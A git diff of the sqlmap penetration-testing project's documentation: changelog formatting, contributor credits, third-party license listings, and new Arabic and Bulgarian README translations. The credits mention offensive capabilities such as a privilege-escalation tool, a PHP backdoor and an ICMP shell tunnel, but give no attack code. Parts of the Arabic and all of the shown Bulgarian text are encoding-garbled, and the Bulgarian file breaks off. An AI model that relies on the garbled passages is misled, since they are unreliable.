# Version 0.3 (2007-01-20) @@ -282,10 +393,10 @@ * Added module for MS SQL Server; * Strongly improved MySQL dbms active fingerprint and added MySQL comment injection check; * Added PostgreSQL dbms active fingerprint; -* Added support for string match (--string); -* Added support for UNION check (--union-check); +* Added support for string match (`--string`); +* Added support for UNION check (`--union-check`); * Removed duplicated code, delegated most of features to the engine in common.py and option.py; -* Added support for --data command line argument to pass the string for POST requests; +* Added support for `--data` command line argument to pass the string for POST requests; * Added encodeParams() method to encode url parameters before making http request; * Many bug fixes; * Rewritten documentation files; diff --git a/doc/FAQ.pdf b/doc/FAQ.pdf deleted file mode 100644 index a60079e06de..00000000000 Binary files a/doc/FAQ.pdf and /dev/null differ diff --git a/doc/README.pdf b/doc/README.pdf deleted file mode 100644 index b5b21e9a306..00000000000 Binary files a/doc/README.pdf and /dev/null differ diff --git a/doc/THANKS.md b/doc/THANKS.md index 94786e8f4b8..62d4ba136cf 100644 --- a/doc/THANKS.md +++ b/doc/THANKS.md @@ -1,762 +1,819 @@ # Individuals -Andres Tarasco Acuna, +Andres Tarasco Acuna, * for suggesting a feature -Santiago Accurso, +Santiago Accurso, * for reporting a bug -Zaki Akhmad, +Syed Afzal, +* for contributing a WAF script varnish.py + +Zaki Akhmad, * for suggesting a couple of features -Olu Akindeinde, +Olu Akindeinde, * for reporting a couple of bugs -David Alvarez, +David Alvarez, * for reporting a bug -Sergio Alves, +Sergio Alves, * for reporting a bug -Thomas Anderson, +Thomas Anderson, * for reporting a bug -Chip Andrews, +Chip Andrews, * for his excellent work maintaining the SQL Server versions database at SQLSecurity.com and permission to implement the update feature taking data from his site -Smith Andy, +Smith Andy, * for suggesting a feature -Otavio Augusto, +Otavio Augusto, * for reporting a minor bug -Simon Baker, +Simon Baker, * for reporting some bugs -Ryan Barnett, +Ryan Barnett, * for organizing the ModSecurity SQL injection challenge, http://modsecurity.org/demo/challenge.html -Emiliano Bazaes, +Emiliano Bazaes, * for reporting a minor bug -Daniele Bellucci, +Daniele Bellucci, * for starting sqlmap project and developing it between July and August 2006 -Sebastian Bittig, and the rest of the team at r-tec IT Systeme GmbH +Sebastian Bittig, and the rest of the team at r-tec IT Systeme GmbH * for contributing the DB2 support initial patch: fingerprint and enumeration -Anthony Boynes, +Anthony Boynes, * for reporting several bugs Marcelo Toscani Brandao * for reporting a bug -Velky Brat, +Velky Brat, * for suggesting a minor enhancement to the bisection algorithm -James Briggs, +James Briggs, * for suggesting a minor enhancement -Gianluca Brindisi, +Gianluca Brindisi, * for reporting a couple of bugs -Jack Butler, +Jack Butler, * for contributing the sqlmap site favicon -Ulisses Castro, +Ulisses Castro, * for reporting a bug -Roberto Castrogiovanni, +Roberto Castrogiovanni, * for reporting a minor bug -Cesar Cerrudo, +Cesar Cerrudo, * for his Windows access token kidnapping tool Churrasco included in sqlmap tree as a contrib library and used to run the stand-alone payload stager on the target Windows machine as SYSTEM user if the user wants to perform a privilege escalation attack, http://www.argeniss.com/research/TokenKidnapping.pdf -Karl Chen, +Karl Chen, 
* for contributing the initial multi-threading patch for the inference algorithm -Y P Chien, +Y P Chien, * for reporting a minor bug -Pierre Chifflier, and Mark Hymers, +Pierre Chifflier, and Mark Hymers, * for uploading and accepting the sqlmap Debian package to the official Debian project repository -Chris Clements, +Hysia Chow +* for contributing a couple of WAF scripts + +Chris Clements, * for reporting a couple of bugs -John Cobb, +John Cobb, * for reporting a minor bug -Andreas Constantinides, +Andreas Constantinides, * for reporting a minor bug -Andre Costa, +Andre Costa, * for reporting a minor bug * for suggesting a minor enhancement -Ulises U. Cune, +Ulises U. Cune, * for reporting a bug -Alessandro Curio, +Alessandro Curio, * for reporting a minor bug -Alessio Dalla Piazza, +Alessio Dalla Piazza, * for reporting a couple of bugs -Sherif El-Deeb, +Alexis Danizan, +* for contributing support for ClickHouse + +Sherif El-Deeb, * for reporting a minor bug -Stefano Di Paola, +Thomas Etrillard, +* for contributing the IBM DB2 error-based payloads (RAISE_ERROR) + +Stefano Di Paola, * for suggesting good features -Mosk Dmitri, +Mosk Dmitri, * for reporting a minor bug -Carey Evans, +Meng Dong, +* for contributing a code for Waffit integration + +Carey Evans, * for his fcrypt module that allows crypt(3) support on Windows platforms -Shawn Evans, +Shawn Evans, * for suggesting an idea for one tamper script, greatest.py -Adam Faheem, +Adam Faheem, * for reporting a few bugs -James Fisher, +James Fisher, * for contributing two very good feature requests * for his great tool too brute force directories and files names on web/application servers, DirBuster, http://tinyurl.com/dirbuster -Jim Forster, +Jim Forster, * for reporting a bug -Rong-En Fan, -* for commiting the sqlmap 0.5 port to the official FreeBSD project repository +Rong-En Fan, +* for committing the sqlmap 0.5 port to the official FreeBSD project repository -Giorgio Fedon, +Giorgio Fedon, * for suggesting a speed improvement for bisection algorithm * for reporting a bug when running against Microsoft SQL Server 2005 -Kasper Fons, +Kasper Fons, * for reporting several bugs -Jose Fonseca, -* for his Gprof2Dot utility for converting profiler output to dot graph(s) and for his XDot utility to render nicely dot graph(s), both included in sqlmap tree inside extra folder. These libraries are used for sqlmap development purposes only - http://code.google.com/p/jrfonseca/wiki/Gprof2Dot - http://code.google.com/p/jrfonseca/wiki/XDot - -Alan Franzoni, -* for helping me out with Python subprocess library +Alan Franzoni, +* for helping out with Python subprocess library -Harold Fry, +Harold Fry, * for suggesting a minor enhancement -Daniel G. Gamonal, +Daniel G. 
Gamonal, * for reporting a minor bug -Marcos Mateos Garcia, +Marcos Mateos Garcia, * for reporting a minor bug -Andrew Gecse, +Andrew Gecse, * for reporting a minor issue -Ivan Giacomelli, +Ivan Giacomelli, * for reporting a bug * for suggesting a minor enhancement * for reviewing the documentation -Nico Golde, +Dimitris Giannitsaros, +* for contributing a REST-JSON API client + +Nico Golde, * for reporting a couple of bugs -Oliver Gruskovnjak, +Oliver Gruskovnjak, * for reporting a bug * for contributing a minor patch -Davide Guerri, +Davide Guerri, * for suggesting an enhancement -Dan Guido, +Dan Guido, * for promoting sqlmap in the context of the Penetration Testing and Vulnerability Analysis class at the Polytechnic University of New York, http://isisblogs.poly.edu/courses/pentest/ -David Guimaraes, +David Guimaraes, * for reporting considerable amount of bugs * for suggesting several features -Chris Hall, -* for coding the prettyprint.py library - -Tate Hansen, +Tate Hansen, * for donating to sqlmap development -Mario Heiderich, -Christian Matthies, -Lars H. Strojny, -* for their great tool PHPIDS included in sqlmap tree as a set of rules for testing payloads against IDS detection, http://php-ids.org +Mario Heiderich, +Christian Matthies, +Lars H. Strojny, +* for their great tool PHPIDS included in sqlmap tree as a set of rules for testing payloads against IDS detection, https://github.com/PHPIDS/PHPIDS -Kristian Erik Hermansen, +Kristian Erik Hermansen, * for reporting a bug * for donating to sqlmap development -Alexander Hagenah, +Alexander Hagenah, * for reporting a minor bug -Dennis Hecken, +Dennis Hecken, * for reporting a minor bug -Choi Ho, +Choi Ho, * for reporting a minor bug -Jorge Hoya, +Jorge Hoya, * for suggesting a minor enhancement -Will Holcomb, +Will Holcomb, * for his MultipartPostHandler class to handle multipart POST forms and permission to include it within sqlmap source code -Daniel Huckmann, +Daniel Huckmann, * for reporting a couple of bugs -Daliev Ilya, +Daliev Ilya, * for reporting a bug -Jovon Itwaru, +Mehmet İnce, +* for contributing a tamper script xforwardedfor.py + +Jovon Itwaru, * for reporting a minor bug -Prashant Jadhav, +Prashant Jadhav, * for reporting a bug -Dirk Jagdmann, +Dirk Jagdmann, * for reporting a typo in the documentation -Luke Jahnke, +Luke Jahnke, * for reporting a bug when running against MySQL < 5.0 -David Klein, +Andrew Kitis +* for contributing a tamper script lowercase.py + +David Klein, * for reporting a minor code improvement -Sven Klemm, +Sven Klemm, * for reporting two minor bugs with PostgreSQL -Anant Kochhar, +Anant Kochhar, * for providing with feedback on the user's manual -Dmitriy Kononov, +Dmitriy Kononov, * for reporting a minor bug -Alexander Kornbrust, +Alexander Kornbrust, * for reporting a couple of bugs -Krzysztof Kotowicz, +Krzysztof Kotowicz, * for reporting a minor bug -Nicolas Krassas, +Nicolas Krassas, * for reporting a couple of bugs -Oliver Kuckertz, +Oliver Kuckertz, * for contributing a minor patch -Alex Landa, +Alex Landa, * for contributing a patch adding beta support for XML output -Guido Landi, +Guido Landi, * for reporting a couple of bugs * for the great technical discussions * for Microsoft SQL Server 2000 and Microsoft SQL Server 2005 'sp_replwritetovarbin' stored procedure heap-based buffer overflow (MS09-004) exploit development -* for presenting with me at SOURCE Conference 2009 in Barcelona (Spain) on September 21, 2009 and at CONfidence 2009 in Warsaw (Poland) on November 20, 2009 +* for 
presenting with Bernardo at SOURCE Conference 2009 in Barcelona (Spain) on September 21, 2009 and at CONfidence 2009 in Warsaw (Poland) on November 20, 2009 -Lee Lawson, +Lee Lawson, * for reporting a minor bug -John J. Lee, and others +John J. Lee, and others * for developing the clientform Python library used by sqlmap to parse forms when --forms switch is specified -Nico Leidecker, +Nico Leidecker, * for providing with feedback on a few features * for reporting a couple of bugs * for his great tool icmpsh included in sqlmap tree to get a command prompt via an out-of-band tunnel over ICMP, http://leidecker.info/downloads/icmpsh.zip -Gabriel Lima, +Gabriel Lima, * for reporting a couple of bugs -Svyatoslav Lisin, +Svyatoslav Lisin, * for suggesting a minor feature -Miguel Lopes, +Miguel Lopes, * for reporting a minor bug -Truong Duc Luong, +Truong Duc Luong, * for reporting a minor bug -Pavol Luptak, +Pavol Luptak, * for reporting a bug when injecting on a POST data parameter -Till Maas, +Till Maas, * for suggesting a minor feature -Michael Majchrowicz, +Michael Majchrowicz, * for extensively beta-testing sqlmap on various MySQL DBMS * for providing really appreciated feedback * for suggesting a lot of ideas and features -Ahmad Maulana, -* for contributing one tamper script, halfversionedmorekeywords.py +Vinícius Henrique Marangoni, +* for contributing a Portuguese translation of README.md + +Francesco Marano, +* for contributing the Microsoft SQL Server/Sybase error-based - Stacking (EXEC) payload + +Ahmad Maulana, +* for contributing a tamper script halfversionedmorekeywords.py -Ferruh Mavituna, +Ferruh Mavituna, * for exchanging ideas on the implementation of a couple of features -David McNab, +David McNab, * for his XMLObject module that allows XML files to be operated on like Python objects -Spencer J. McIntyre, +Spencer J. 
McIntyre, * for reporting a minor bug * for contributing a patch for OS fingerprinting on DB2 -Brad Merrell, +Brad Merrell, * for reporting a minor bug -Michael Meyer, +Michael Meyer, * for suggesting a minor feature -Enrico Milanese, +Enrico Milanese, * for reporting a minor bug * for sharing some ideas for the PHP backdoor -Liran Mimoni, +Liran Mimoni, * for reporting a minor bug -Marco Mirandola, +Marco Mirandola, * for reporting a minor bug -Devon Mitchell, +Devon Mitchell, * for reporting a minor bug -Anton Mogilin, +Anton Mogilin, * for reporting a few bugs -Sergio Molina, +Sergio Molina, * for reporting a minor bug -Anastasios Monachos, +Anastasios Monachos, * for providing some useful data * for suggesting a feature * for reporting a couple of bugs -Kirill Morozov, +Kirill Morozov, * for reporting a bug * for suggesting a feature -Alejo Murillo Moya, +Alejo Murillo Moya, * for reporting a minor bug * for suggesting a few features -Yonny Mutai, +Yonny Mutai, * for reporting a minor bug -Roberto Nemirovsky, -* for pointing me out some enhancements +Roberto Nemirovsky, +* for pointing out some enhancements -Simone Onofri, +Sebastian Nerz, +* for reporting a (potential) vulnerability in --eval + +Simone Onofri, * for patching the PHP web backdoor to make it work properly also on Windows -Michele Orru, +Michele Orru, * for reporting a couple of bug * for suggesting ideas on how to implement the RESTful API -Shaohua Pan, +Shaohua Pan, * for reporting several bugs * for suggesting a few features -Antonio Parata, +Antonio Parata, * for sharing some ideas for the PHP backdoor -Adrian Pastor, +Adrian Pastor, * for donating to sqlmap development -Christopher Patten, +Christopher Patten, * for reporting a bug in the blind SQL injection bisection algorithm -Zack Payton, +Zack Payton, * for reporting a minor bug -Jaime Penalba, +Jaime Penalba, * for contributing a patch for INSERT/UPDATE generic boundaries -Pedrito Perez, <0ark1ang3l@gmail.com> +Pedrito Perez, <0ark1ang3l(at)gmail.com> * for reporting a couple of bugs -Brandon Perry, +Brandon Perry, * for reporting a couple of bugs -Travis Phillips, +Travis Phillips, * for suggesting a minor enhancement -Mark Pilgrim, +Mark Pilgrim, * for porting chardet package (Universal Encoding Detector) to Python -Steve Pinkham, +Steve Pinkham, * for suggesting a feature * for contributing a new SQL injection vector (MSSQL time-based blind) * for donating to sqlmap development -Adam Pridgen, +Adam Pridgen, * for suggesting some features -Luka Pusic, +Luka Pusic, * for reporting a couple of bugs -Ole Rasmussen, +Ole Rasmussen, * for reporting a bug * for suggesting a feature -Alberto Revelli, -* for inspiring me to write sqlmap user's manual in SGML +Alberto Revelli, +* for inspiring to write sqlmap user's manual in SGML * for his great Microsoft SQL Server take over tool, sqlninja, http://sqlninja.sourceforge.net -David Rhoades, +David Rhoades, * for reporting a bug -Andres Riancho, +Andres Riancho, * for beta-testing sqlmap * for reporting a bug and suggesting some features * for including sqlmap in his great web application audit and attack framework, w3af, http://w3af.sourceforge.net * for suggesting a way for handling DNS caching -Jamie Riden, +Jamie Riden, * for reporting a minor bug -Alexander Rigbo, +Alexander Rigbo, * for contributing a minor patch -Antonio Riva, +Antonio Riva, * for reporting a bug when running with python 2.5 -Ethan Robish, +Ethan Robish, * for reporting a bug -Levente Rog, +Levente Rog, * for reporting a minor bug -Andrea Rossi, 
+Andrea Rossi, * for reporting a minor bug * for suggesting a feature -Frederic Roy, +Frederic Roy, * for reporting a couple of bugs -Vladimir Rutsky, +Vladimir Rutsky, * for suggesting a couple of minor enhancements -Richard Safran, +Richard Safran, * for donating the sqlmap.org domain -Tomoyuki Sakurai, +Tomoyuki Sakurai, * for submitting to the FreeBSD project the sqlmap 0.5 port -Roberto Salgado, +Roberto Salgado, * for contributing considerable amount of tamper scripts -Pedro Jacques Santos Santiago, +Pedro Jacques Santos Santiago, * for reporting considerable amount of bugs -Marek Sarvas, +Marek Sarvas, * for reporting several bugs -Philippe A. R. Schaeffer, +Philippe A. R. Schaeffer, * for reporting a minor bug -Mohd Zamiri Sanin, +Henri Salo +* for a donation + +Mohd Zamiri Sanin, * for reporting a minor bug -Jorge Santos, +Jorge Santos, * for reporting a minor bug -Sven Schluter, +Sven Schluter, * for contributing a patch * for waiting a number of seconds between each HTTP request -Ryan Sears, +Ryan Sears, * for suggesting a couple of enhancements * for donating to sqlmap development -Uemit Seren, +Uemit Seren, * for reporting a minor adjustment when running with python 2.6 -Shane Sewell, +Shane Sewell, * for suggesting a feature -Ahmed Shawky, +Ahmed Shawky, * for reporting a major bug with improper handling of parameter values * for reporting a bug -Brian Shura, +Brian Shura, * for reporting a bug -Sumit Siddharth, +Sumit Siddharth, * for sharing ideas on the implementation of a couple of features -Andre Silva, +Andre Silva, * for reporting a bug -Benjamin Silva H. +Benjamin Silva H. * for reporting a bug -Duarte Silva +Duarte Silva * for reporting a couple of bugs -M Simkin, +M Simkin, * for suggesting a feature -Konrads Smelkovs, +Tanaydin Sirin, +* for implementation of ncurses TUI (switch --tui) + +Konrads Smelkovs, * for reporting a few bugs in --sql-shell and --sql-query on Microsoft SQL Server -Chris Spencer, +Chris Spencer, * for reviewing the user's manual grammar -Michael D. Stenner, +Michael D. 
Stenner, * for his keepalive module that allows handling of persistent HTTP 1.1 keep-alive connections -Marek Stiefenhofer, +Marek Stiefenhofer, * for reporting a few bugs -Jason Swan, +Jason Swan, * for reporting a bug when enumerating columns on Microsoft SQL Server * for suggesting a couple of improvements -Chilik Tamir, +Chilik Tamir, * for contributing a patch for initial support SOAP requests -Alessandro Tanasi, +Alessandro Tanasi, * for extensively beta-testing sqlmap * for suggesting many features and reporting some bugs * for reviewing the documentation -Andres Tarasco, +Andres Tarasco, * for contributing good feedback -Tom Thumb, +Tom Thumb, * for reporting a major bug -Kazim Bugra Tombul, +Kazim Bugra Tombul, * for reporting a minor bug -Efrain Torres, -* for helping me out to improve the Metasploit Framework sqlmap auxiliary module and for commiting it on the Metasploit official subversion repository +Efrain Torres, +* for helping out to improve the Metasploit Framework sqlmap auxiliary module and for committing it on the Metasploit official subversion repository * for his great Metasploit WMAP Framework -Sandro Tosi, +Jennifer Torres, +* for contributing a tamper script luanginx.py + +Sandro Tosi, * for helping to create sqlmap Debian package correctly -Jacco van Tuijl, +Jacco van Tuijl, * for reporting several bugs -Vitaly Turenko, +Vitaly Turenko, * for reporting a bug -Augusto Urbieta, +Augusto Urbieta, * for reporting a minor bug -Bedirhan Urgun, +Bedirhan Urgun, * for reporting a few bugs * for suggesting some features and improvements * for benchmarking sqlmap in the context of his SQL injection benchmark project, OWASP SQLiBench, http://code.google.com/p/sqlibench -Kyprianos Vasilopoulos, +Kyprianos Vasilopoulos, * for reporting a couple of minor bugs -Vlado Velichkovski, +Vlado Velichkovski, * for reporting considerable amount of bugs * for suggesting an enhancement -Johnny Venter, +Johnny Venter, * for reporting a couple of bugs -Carlos Gabriel Vergara, +Carlos Gabriel Vergara, * for suggesting couple of good features -Patrick Webster, +Patrick Webster, * for suggesting an enhancement +* for donating to sqlmap development (from OSI.Security) -Ed Williams, +Ed Williams, * for suggesting a minor enhancement -Anthony Zboralski, +Anthony Zboralski, * for providing with detailed feedback * for reporting a few minor bugs * for donating to sqlmap development -Thierry Zoller, +Thierry Zoller, * for reporting a couple of major bugs -Zhen Zhou, +Zhen Zhou, * for suggesting a feature --insane-, +-insane-, * for reporting a minor bug -1ndr4 joe, +1ndr4 joe, * for reporting a couple of bugs -abc abc, +abc abc, * for reporting a minor bug -Abuse 007, +Abuse 007, * for reporting a bug -Alex, +agix, +* for contributing the file upload via certutil.exe functionality + +Alex, * for reporting a minor bug -anonymous anonymous, +anonymous anonymous, * for reporting a couple of bugs -bamboo, +bamboo, * for reporting a couple of bugs -Brandon E., +Brandon E., * for reporting a bug -black zero, +black zero, * for reporting a minor bug -blueBoy, +blueBoy, * for reporting a bug -buawig, +buawig, * for reporting considerable amount of bugs -Bugtrace, +Bugtrace, * for reporting several bugs -cats, +cats, * for reporting a couple of bugs -Christian S, +Christian S, * for reporting a minor bug -clav, +clav, * for reporting a minor bug -dragoun dash, +dragoun dash, * for reporting a minor bug -fufuh, +flsf, +* for contributing WAF scripts 360.py, anquanbao.py, baidu.py, safedog.py +* for 
contributing a minor patch + +fufuh, * for reporting a bug when running on Windows -Hans Wurst, +Hans Wurst, * for reporting a couple of bugs -james, +Hysia, +* for contributing a Chinese translation of README.md + +james, * for reporting a bug -Joe "Pragmatk", +Joe "Pragmatk", * for reporting a few bugs -John Smith, +John Smith, * for reporting several bugs * for suggesting some features -m4l1c3, +m4l1c3, * for reporting considerable amount of bugs -mariano, +mariano, * for reporting a bug -mitchell, +mitchell, * for reporting a few bugs -Nadzree, +Nadzree, * for reporting a minor bug -nightman, +nightman, * for reporting considerable amount of bugs -Oso Dog osodog123@yahoo.com +Oso Dog osodog123(at)yahoo.com * for reporting a minor bug -pacman730, +pacman730, * for reporting a bug -pentestmonkey, +pentestmonkey, * for reporting several bugs * for suggesting a few minor enhancements -Phat R., +Phat R., * for reporting a few bugs -Phil P, <@superevr> +Phil P, <(at)superevr> * for suggesting a minor enhancement -ragos, +ragos, * for reporting a minor bug -rmillet, +rmillet, * for reporting a bug -Rub3nCT, +Rub3nCT, * for reporting a minor bug -shiftzwei, +sapra, +* for helping out with Python multiprocessing library on MacOS + +shiftzwei, * for reporting a couple of bugs -smith, +smith, * for reporting a minor bug -Soma Cruz, +Soma Cruz, * for reporting a minor bug -Stuffe, +Spiros94, +* for contributing a Greek translation of README.md + +Stuffe, * for reporting a minor bug and a feature request -Sylphid, +Sylphid, * for suggesting some features -syssecurity.info, +syssecurity.info, * for reporting a minor bug -This LittlePiggy, +This LittlePiggy, * for reporting a minor bug -ToR, +ToR, * for reporting considerable amount of bugs * for suggesting a feature -ultramegaman, +ultramegaman, * for reporting a minor bug -Vinicius, +Vinicius, * for reporting a minor bug -wanglei, +virusdefender +* for contributing WAF scripts safeline.py + +w8ay +* for contributing an implementation for chunked transfer-encoding (switch --chunked) + +wanglei, * for reporting a minor bug -warninggp, +warninggp, * for reporting a few minor bugs -x, +x, * for reporting a bug -zhouhx, +zhouhx, * for contributing a minor patch # Organizations -Black Hat team, +Black Hat team, * for the opportunity to present my research titled 'Advanced SQL injection to operating system full control' at Black Hat Europe 2009 Briefings on April 16, 2009 in Amsterdam (NL). I unveiled and demonstrated some of the sqlmap 0.7 release candidate version new features during my presentation * Homepage: http://goo.gl/BKfs7 * Slides: http://goo.gl/Dh65t * White paper: http://goo.gl/spX3N -SOURCE Conference team, +SOURCE Conference team, * for the opportunity to present my research titled 'Expanding the control over the operating system from the database' at SOURCE Conference 2009 on September 21, 2009 in Barcelona (ES). I unveiled and demonstrated some of the sqlmap 0.8 release candidate version new features during my presentation * Homepage: http://goo.gl/IeXV4 * Slides: http://goo.gl/OKnfj -AthCon Conference team, +AthCon Conference team, * for the opportunity to present my research titled 'Got database access? Own the network!' at AthCon Conference 2010 on June 3, 2010 in Athens (GR). 
I unveiled and demonstrated some of the sqlmap 0.8 version features during my presentation * Homepage: http://goo.gl/Fs71I * Slides: http://goo.gl/QMfjO -Metasploit Framework development team, +Metasploit Framework development team, * for their powerful tool Metasploit Framework, used by sqlmap, among others things, to create the shellcode and establish an out-of-band connection between sqlmap and the database server * Homepage: http://www.metasploit.com -OWASP Board, +OWASP Board, * for sponsoring part of the sqlmap development in the context of OWASP Spring of Code 2007 * Homepage: http://www.owasp.org diff --git a/doc/THIRD-PARTY.md b/doc/THIRD-PARTY.md index 379e752f805..03c0c01e8f4 100644 --- a/doc/THIRD-PARTY.md +++ b/doc/THIRD-PARTY.md @@ -2,25 +2,20 @@ This file lists bundled packages and their associated licensing terms. # BSD -* The Ansistrm library located under thirdparty/ansistrm/. +* The `Ansistrm` library located under `thirdparty/ansistrm/`. Copyright (C) 2010-2012, Vinay Sajip. -* The Beautiful Soup library located under thirdparty/beautifulsoup/. +* The `Beautiful Soup` library located under `thirdparty/beautifulsoup/`. Copyright (C) 2004-2010, Leonard Richardson. -* The ClientForm library located under thirdparty/clientform/. +* The `ClientForm` library located under `thirdparty/clientform/`. Copyright (C) 2002-2007, John J. Lee. Copyright (C) 2005, Gary Poster. Copyright (C) 2005, Zope Corporation. Copyright (C) 1998-2000, Gisle Aas. -* The Colorama library located under thirdparty/colorama/. - Copyright (C) 2010, Jonathan Hartley. -* The Fcrypt library located under thirdparty/fcrypt/. +* The `Colorama` library located under `thirdparty/colorama/`. + Copyright (C) 2013, Jonathan Hartley. +* The `Fcrypt` library located under `thirdparty/fcrypt/`. Copyright (C) 2000, 2001, 2004 Carey Evans. -* The Odict library located under thirdparty/odict/. - Copyright (C) 2005, Nicola Larosa, Michael Foord. -* The Oset library located under thirdparty/oset/. - Copyright (C) 2010, BlueDynamics Alliance, Austria. - Copyright (C) 2009, Raymond Hettinger, and others. -* The SocksiPy library located under thirdparty/socks/. +* The `SocksiPy` library located under `thirdparty/socks/`. Copyright (C) 2006, Dan-Haim. ```` @@ -49,17 +44,13 @@ SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. # LGPL -* The Chardet library located under thirdparty/chardet/. +* The `Chardet` library located under `thirdparty/chardet/`. Copyright (C) 2008, Mark Pilgrim. -* The Gprof2dot library located under thirdparty/gprof2dot/. - Copyright (C) 2008-2009, Jose Fonseca. -* The KeepAlive library located under thirdparty/keepalive/. +* The `KeepAlive` library located under `thirdparty/keepalive/`. Copyright (C) 2002-2003, Michael D. Stenner. -* The MultipartPost library located under thirdparty/multipartpost/. +* The `MultipartPost` library located under `thirdparty/multipart/`. Copyright (C) 2006, Will Holcomb. -* The XDot library located under thirdparty/xdot/. - Copyright (C) 2008, Jose Fonseca. -* The icmpsh tool located under extra/icmpsh/. +* The `icmpsh` tool located under `extra/icmpsh/`. Copyright (C) 2010, Nico Leidecker, Bernardo Damele. ```` @@ -232,7 +223,7 @@ Library. # PSF -* The Magic library located under thirdparty/magic/. +* The `Magic` library located under `thirdparty/magic/`. Copyright (C) 2011, Adam Hupp. ```` @@ -277,13 +268,15 @@ be bound by the terms and conditions of this License Agreement. # MIT -* The bottle web framework library located under extra/bottle/. 
- Copyright (C) 2012, Marcel Hellkamp. -* The PageRank library located under thirdparty/pagerank/. - Copyright (C) 2010, Corey Goldberg. -* The PrettyPrint library located under thirdparty/prettyprint/. - Copyright (C) 2010, Chris Hall. -* The Termcolor library located under thirdparty/termcolor/. +* The `bottle` web framework library located under `thirdparty/bottle/`. + Copyright (C) 2024, Marcel Hellkamp. +* The `identYwaf` library located under `thirdparty/identywaf/`. + Copyright (C) 2019-2021, Miroslav Stampar. +* The `ordereddict` library located under `thirdparty/odict/`. + Copyright (C) 2009, Raymond Hettinger. +* The `six` Python 2 and 3 compatibility library located under `thirdparty/six/`. + Copyright (C) 2010-2024, Benjamin Peterson. +* The `Termcolor` library located under `thirdparty/termcolor/`. Copyright (C) 2008-2011, Volvox Development Team. ```` @@ -310,5 +303,7 @@ WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. # Public domain -* The PyDes library located under thirdparty/pydes/. +* The `PyDes` library located under `thirdparty/pydes/`. Copyleft 2009, Todd Whiteman. +* The `win_inet_pton` library located under `thirdparty/wininetpton/`. + Copyleft 2014, Ryan Vennell. diff --git a/doc/translations/README-ar-AR.md b/doc/translations/README-ar-AR.md new file mode 100644 index 00000000000..29d8e9f15b0 --- /dev/null +++ b/doc/translations/README-ar-AR.md @@ -0,0 +1,68 @@ +# sqlmap ![](https://i.imgur.com/fe85aVR.png) + +[![.github/workflows/tests.yml](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml/badge.svg)](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [![Python 2.7|3.x](https://img.shields.io/badge/python-2.7|3.x-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [![X](https://img.shields.io/badge/x-@sqlmap-blue.svg)](https://x.com/sqlmap) + +
+
+برنامج sqlmap هو أداة اختبار اختراق مفتوحة المصدر تقوم بأتمتة عملية اكتشاف واستغلال ثغرات حقن SQL والسيطرة على خوادم قواعد البيانات. يأتي مع محرك كشف قوي، والعديد من الميزات المتخصصة لمختبر الاختراق المحترف، ومجموعة واسعة من الخيارات بما في ذلك تحديد بصمة قاعدة البيانات، واستخراج البيانات من قاعدة البيانات، والوصول إلى نظام الملفات الأساسي، وتنفيذ الأوامر على نظام التشغيل عبر اتصالات خارج النطاق.
+
+لقطات الشاشة
+----
+
+ +![Screenshot](https://raw.github.com/wiki/sqlmapproject/sqlmap/images/sqlmap_screenshot.png) + +
+
+يمكنك زيارة [مجموعة لقطات الشاشة](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) التي توضح بعض الميزات في الويكي.
+
+التثبيت
+----
+
+يمكنك تحميل أحدث إصدار tarball بالنقر [هنا](https://github.com/sqlmapproject/sqlmap/tarball/master) أو أحدث إصدار zipball بالنقر [هنا](https://github.com/sqlmapproject/sqlmap/zipball/master).
+
+يفضل تحميل sqlmap عن طريق استنساخ مستودع [Git](https://github.com/sqlmapproject/sqlmap):
+
+ + git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev + +
+
+يعمل sqlmap مباشرة مع [Python](https://www.python.org/download/) إصدار **2.6** و **2.7** و **3.x** على أي نظام تشغيل.
+
+الاستخدام
+----
+
+للحصول على قائمة بالخيارات والمفاتيح الأساسية استخدم:
+
+ + python sqlmap.py -h + +
+
+للحصول على قائمة بجميع الخيارات والمفاتيح استخدم:
+
+ + python sqlmap.py -hh + +
+ +يمكنك العثور على مثال للتشغيل [هنا](https://asciinema.org/a/46601). +للحصول على نظرة عامة على إمكانيات sqlmapØŒ وقائمة الميزات المدعومة، ووص٠لجميع الخيارات ÙˆØ§Ù„Ù…ÙØ§ØªÙŠØ­ØŒ مع الأمثلة، ننصحك بمراجعة [دليل المستخدم](https://github.com/sqlmapproject/sqlmap/wiki/Usage). + +الروابط +---- + +* Ø§Ù„ØµÙØ­Ø© الرئيسية: https://sqlmap.org +* التحميل: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) أو [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master) +* تغذية التحديثات RSS: https://github.com/sqlmapproject/sqlmap/commits/master.atom +* تتبع المشكلات: https://github.com/sqlmapproject/sqlmap/issues +* دليل المستخدم: https://github.com/sqlmapproject/sqlmap/wiki +* الأسئلة الشائعة: https://github.com/sqlmapproject/sqlmap/wiki/FAQ +* تويتر: [@sqlmap](https://x.com/sqlmap) +* العروض التوضيحية: [https://www.youtube.com/user/inquisb/videos](https://www.youtube.com/user/inquisb/videos) +* لقطات الشاشة: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots \ No newline at end of file diff --git a/doc/translations/README-bg-BG.md b/doc/translations/README-bg-BG.md new file mode 100644 index 00000000000..d66b5301e11 --- /dev/null +++ b/doc/translations/README-bg-BG.md @@ -0,0 +1,50 @@ +# sqlmap ![](https://i.imgur.com/fe85aVR.png) + +[![.github/workflows/tests.yml](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml/badge.svg)](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [![Python 2.7|3.x](https://img.shields.io/badge/python-2.7|3.x-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [![x](https://img.shields.io/badge/x-@sqlmap-blue.svg)](https://x.com/sqlmap) + +sqlmap e инÑтрумент за теÑтване и проникване, Ñ Ð¾Ñ‚Ð²Ð¾Ñ€ÐµÐ½ код, който автоматизира процеÑа на откриване и използване на недоÑтатъците на SQL база данните чрез SQL инжекциÑ, коÑто ги 